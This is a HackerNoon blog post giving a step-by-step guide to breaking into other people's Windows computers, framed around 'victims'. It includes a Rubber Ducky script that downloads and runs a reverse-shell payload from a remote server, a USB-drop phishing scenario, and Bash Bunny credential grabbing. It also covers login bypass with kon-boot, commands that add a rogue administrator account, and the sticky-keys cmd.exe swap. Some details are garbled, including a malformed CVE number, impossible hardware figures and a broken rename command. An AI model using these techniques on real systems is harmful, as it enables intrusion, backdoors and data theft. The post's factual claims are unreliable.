How to Hack a Windows Machine Like a Pro Hacker

Written by morpheuslord | Published 2021/08/13
Tech Story Tags: security | cybersecurity | windows-10 | hack-like-a-pro | hacking | white-hat-hackers | ethical-hacking | windows | web-monetization

TLDR Windows is the most commonly used operating system in the market and nearly 90% of us use windows in our day-to-day life. We are looking into the most effective and the most interesting ways that you or a hacker can hack into a Windows machine. We will cover topics related to the hardware, software, CVE's and all the ways you can set up them to run it successfully. We are going to cover topics such as how to use Bash Bunny and Rubber Ducky to hack into Windows machines.via the TL;DR App
In this article, we are looking into the most effective and the most interesting ways that you or a hacker can hack into a Windows machine and we are going to cover topics related to the hardware, software, CVE's and all the ways you can set up them to run it successfully.
Windows is the most commonly used operating system in the market and nearly 90% of us use windows in our day-to-day life. It is a system preferred by common people as it is easy to use and comes with a wide range of products and games for gamers and common people.
Topics to cover
  • Payload injection.
  • Social Engineering.
  • Using Bash Bunny and Rubber Ducky.
  • Bypass The Login page.
  • Problems and risks faced.
  • Previous Windows vulnerability and CVE's.
  • Speed and effectiveness of Bash Bunny and Rubber Ducky.

Payload injection

Payload injection is a common practice in hacking when a hacker gets into your system he tends to create a long-term connection with the system.
For that he needs to inject a payload into the system in this case we can use the famous Rubber Ducky and the ducky script and a server with Metasploit to do this.
Preparation:
  1. Start Metasploit apache server.
  2. Load the windows payload into the website.
  3. Keep the server open until used.
  4. Load ducky script and configure it to download and run the file from the server.
Execution:
Start Metasploit apache server:
You need to consider that you don't know when the victim will download the file and run it so for that. I suggest you place the file in a remote location on some webpage and provide the direct download link to the rubber ducky to do the job.
I have my personal webpage and I have hidden an Inaccessible part of the page where I have stored the .exe or the payload which I configured that gives me a reverse connection to my hacker system.
Load the windows payload into the website:
So I have done loading it into my website and I have gained the link to it.
Keep the server open until used:
I have a raspberry pi in my workstation that works 24/7 with really good internet with another system running the hacker machine in another raspberry pi which I have a connection with a highly secure SSH connection from which I monitor and listen from the target.
Load ducky script and configure it to download and run the file from the server:
Here is a simple ducky script that does the work for you.
REM Title: Powershell Wget & Execute            Author: Mubix                  Version: 1.2
REM Description: Opens Run menu, throws power shell string, enter. Supports HTTP/S and Proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('DOWNLOAD LINK'); Start-Process "%TEMP%\PAYLOAD NAME"
ENTER
In place of DOWNLOAD LINK add your payload download link and in place of PAYLOAD NAME give your payload name.
This will run the code for you and it is really fast it completes its task in seconds.
This will give a reverse TCP or HTTP connection according to your payload of choice.

Social Engineering

Our previous payload injection is a part of social engineering. So to complete the payload injection you need to at least have the system free for twenty seconds or so to do it.
If you place the payload which does not have a lot of data is not huge in size it won't be an issue but make sure that you have the system free for about 20 seconds.
For a better explanation let us imagine two characters A and B
A is the hacker and B is a normal software engineer in a company called Ramtech.
One day B found a random Pendrive on the streets and picked it up out of curiosity. The Pendrive was a Rubber Ducky set up by A to hack into the companies systems using B's curiosity as the lead.
A has set up a similar windows payload into the Rubber Ducky and when B plugs the USB in his workplace he is shocked with a sudden splash screen and nothing else and out of fear he plugs out the USB but A has received a reverse connection and has gained access into the companies system and got a chance to do a data breach.
The above story is a really common way a hacker gets access into systems and This is known as spear Phishing where the hacker knows about B and is taking advantage of his weakness which is curiosity.

Using a Bash Bunny and a Rubber Ducky

Bash Bunny:
Bash Bunny is a Hak5 product used to automate credential grabbing, payload injection, etc.
It is basically a Debian system with an 8Gb nano SSD a 512Gb ram and a new feature of adding a 1 Tb worth Extention via an SD card and it is announced on their youtube channel.
You can buy it on their official website link to the store
You can use the most famous Credential Grabber from one of its huge arsenal of payloads its specialty is that capturing the password hash it cracks it with the provided password file or list.
It's really easy to set up and does not require a high knowledge of coding.
A link to David Bombal's video regarding credential grabber link to the video
There a lot of tools with the credential grabber like the Ducky script which allows hacking into number lock brute-forcing android hacking software and much more and works with a change in three of its switches.
This is what Hak5 has to tell us about Bash Bunny:
"This is done in such a way that allows the Bash Bunny to be recognized on the victim's computer as the fastest network, without drivers, automatically – locked or unlocked. As a 2 gigabit adapter with an authoritative DHCP server, the Bash Bunny obtains a low metric. This means that the computer will instantly trust the Bash Bunny with its network traffic — enabling a plethora of automated pocket network attacks undetectable by the existing infrastructure.

These bring-your-own-network attacks are cross-platform, with the Bash Bunny exploiting Mac, Linux, and Android computers with its ECM Ethernet attack mode, and Windows computers with its Microsoft proprietary RNDIS Ethernet attack mode.

Using these methods, attacks like QuickCreds can steal hashed credentials from locked computers in seconds. Plug the Bash Bunny into a computer, wait a few seconds and when the light is green – the trap is clean!
Let's take a look at how the Bash Bunny pulls off this simple and effective attack.
First, we issue the Ethernet attack mode specific to our target. If it's Windows, we'll want to use RNDIS_ETHERNET. If it's a Mac or Linux target, we'll want to use ECM_ETHERNET. Even better - if we're not sure, simply use AUTO_ETHERNET which will try both."
copied the coated content directly from the Hak5 web article
Rubber Ducky:
Rubber Ducky is a small USB-like device that can run commands like a keyboard on a victim's computer using a specific script known as ducky script.
This is really useful in cases of brute-forcing login screens directly downloading and running payloads from the internet etc but it is not as efficient and all-in-one as the Bash Bunny But it is really effective.
This is what Hak5 has to tell us about the Rubber Ducky:
"A two-second HID attack against Windows and Mac that launches the website of your choosing. That's by far the most effective security awareness payload for the USB Rubber Ducky.
Cybersecurity awareness building is important, and developing an effective security awareness program - or at least raising eyebrows that one is even necessary - doesn't need to be difficult."
copied the coated content directly from the Hak5 web article

Bypass the login page

There are so many methods used by hackers to bypass login screens of windows some of them are below:
  • Using kon-boot.
  • Using the quick link menu.
  • Using the pc-unlocker.
  • Using passgeeker.
  • Using shift.
Using kon-boot:
Kon-boot is a really effective tool to use to reset the lock screen password you need to first buy the license for it I prefer you buy the 2 in 1 window and mac os bypass.
First:
You need to purchase the license which after the payment will be emailed to your email account.
Second:
You need to flash the tool to a Pendrive with a minimum of 16Gb memory for better performance.
Usage:
Once you have flashed the tool to a Pendrive you can use it to flash the existing os to Bypass the login screen.
As simple as it can get the victim's pc is now yours just change the password and use it as you wish.😊
Link to kon-boot website www.kon-boot.com
Link to Zaid Sabhi's tutorial youtube.com
The above tutorial from Zaid will help you a lot on kon-boot.
Using the quick link menu:
The Quick link menu is a dropdown menu by which we can access the command prompt, Powershell, task manager, etc.
By using 
WINKEY + X
we can call the dropdown and using the following commands we can create a new superuser for the windows machine.
net user HACKER /add
net localgroup Administrators HACKER /add
In the above code, HACKER is a new superuser for the machine and he has admin powers to manipulate things in the machine.

Using pc-un-locker tool:

Pc un-locker is a well-renowned tool for resetting the password of your device but it comes with a catch it permanently removes the device creds and may need you to reset the system please use it with caution.
This is similar to Kon Boot just install it on a USB drive and then flash it on your pc this is only for windows and does not work with mac or any other system types.
step1:
Download and install the program on any accessible computer (not the locked pc) just install it from the link and store it on another pc or a sandbox image for further safety.
step2:
Run it and burn it to a blank CD /DVD or USB flash drive. Mostly use USB who uses DVD in 2021? Use USB 3.0 for more speed and if you can use a type-c USB for the job.
step3:
Boot locked PC from the newly created disk to reset the admin password. For this, you need to boot from the Bios of the pc if you don't know how to do that just google the laptop name, version, and model, etc. And you will get all the info you need.
There is a standard license of $29.95 which I prefer as it is better compared to the free ones but the free ones are also fine in many cases.

Using passgeeker:

Passgeeker or sysgeeker is a simple tool same as Kon Boot, Pc-unlocker and all the other programs it works on the bios flash method so no need for further explanation on this.
Using Shift:
This is really complex and has a low chance of success but is really effective. You can do this in 2 ways I will explain both in detail the 2 methods are:
  • Social engineering
  • Windows ran into a problem
Method-1 Social engineering:
This has to be done with speed. First, take the target's computer and then navigate to the system32 folder. And change sethc.exe to cmd.exe and cmd.exe to sethc.exe just interchange the names and that's all you have to do.
Now, when the target locks his screen, opens his laptop, and presses the shift key 5 times this will start the Sticky key feature because you have interchanged the names it will instead start Cmd for you with admin permissions. Now type the following commands:
net user USER_NAME PASSWORD /add
Then:
net localgroup administrators USER_ACCOUNT /add
It should look something like this:
Now you need to completely shut down the system after 5 to 6 min after that if it allows you to log in to the system congrats you have hacked the system.
Method-2 Windows ran into a problem:
You can trigger this issue by force shutting down the system and cutting the power off this sometimes triggers a screen where you will be given repair options which include Command prompt. Now when you choose command prompt, it shows X:/ drive instead of C:/ for that you need to enter the following command:
cd C:
And then just copy and paste the commands from below:
cd c:\windows\system32\
and enter the command to change the names of the files:
Ren sethc.exe cmd.exe && Ren cmd.exe sethc
It should work and if it doesn't for some random case just reboot all of it you may lose the data but you get to keep the device technically it's a win if you ask me 🤔🤔🤔.
These are the ways you can actually Bypass the login screens of the systems and these are the most effective ones out there to use and which gives the best output.

Problems and risks faced

First of all, in all of it, the most basic problem is loss of data if you are the guy who is interested in the person's data you may prefer to steal the data in other ways don't use these methods as they have the risk of losing data.
Secondly is getting caught if you are trying to hack an office machine you have the most risk of getting caught then you are at high risk and you may be jailed for this act.
Thirdly you have the chance of getting nothing like you might have no data OS then you should be happy with the hardware only.

Previous Windows vulnerability and CVE's

The most recent ones are " CVE-2021-34527269 " which is a remote code execution vulnerability with a severity of 9.0 that's the highest which is close to being critical if you are a casual person who is reading this for entertainment then Note: UPDATE YOUR SYSTEM PLEASE.
The above CVE was copied directly from cvedetailes.com website. check for the complete list of vulnerabilities for windows from this website CVEDETAILS.COM
And check your windows update regularly.

Speed and effectiveness of Bash Bunny and Rubber Ducky

Reminding you that Rubber Ducky and Bash Bunny are from Hak5 and I have explained about them enough above. I will get to work and explain their speeds and effectiveness. And I am going to score the 2 for Reliability, compatibility, speed, effectiveness.
Bash Bunny:
Bash Bunny mark 2 is considerably fast it has a 7-sec delay and has 500 Mb of ram and 1 Tb of memory expansion and a built-in NVMe drive and that's fast compared to any other device out there and if you ask effectiveness it is super reliable in any case possible it can run Ducky scripts which makes it into a Rubber Ducky and in itself, it is a desktop and a mini pc which you can SSH into and use it and it has a wide range of payloads and tricks under its sleeves making it a clear pen-testers must needed tool. But the only downside is it is a huge thing it is bigger compared to a LAN turtle.
  • Reliability: It's very reliable in any possible case.
  • Compatibility: It's really compact for a pocket pc but in this case its size is huge.
  • Speed: It's really fast compared to Rubber Ducky and that's great.
  • Effectiveness: It's the most effective all-in-one tool for complete penetration testing.
  • Score: 5 out of 6
Rubber Ducky:
It is a really powerful tool for brute-force or any of that sort of keystroke injection and payload injection tool but in comparison to Bash Bunny it stands no chance
  • Reliability: It's very reliable in only some cases.
  • Compatibility: It's really compact and that helps it in social engineering.
  • Speed: It's really fast for keystroke injection but it is slow compared to Bash Bunny.
  • Effectiveness: It's the most effective tool for some cases like giving jump scares and starting reverse shells and all.
  • Score: 4 out of 6
In all I prefer you buy both as each one has its own special feature and all so if you can afford to buy both.

Follow me

Follow my Twitter account for the latest updates
Written by morpheuslord | I am a red team operator, and a security enthusiast I write blogs and articles related to cyber-sec topics.
Published by HackerNoon on 2021/08/13
ABOUTHow hackers start their afternoons. We publish tech stories and build publishing software.

READEntirely free library read by hundreds of millions to learn anything about any technology.

WRITEHackerNoon elevates quality technology writing far and wide across the interwebs.

PARTNERHackerNoon works directly with tech companies to place ads by content relevancy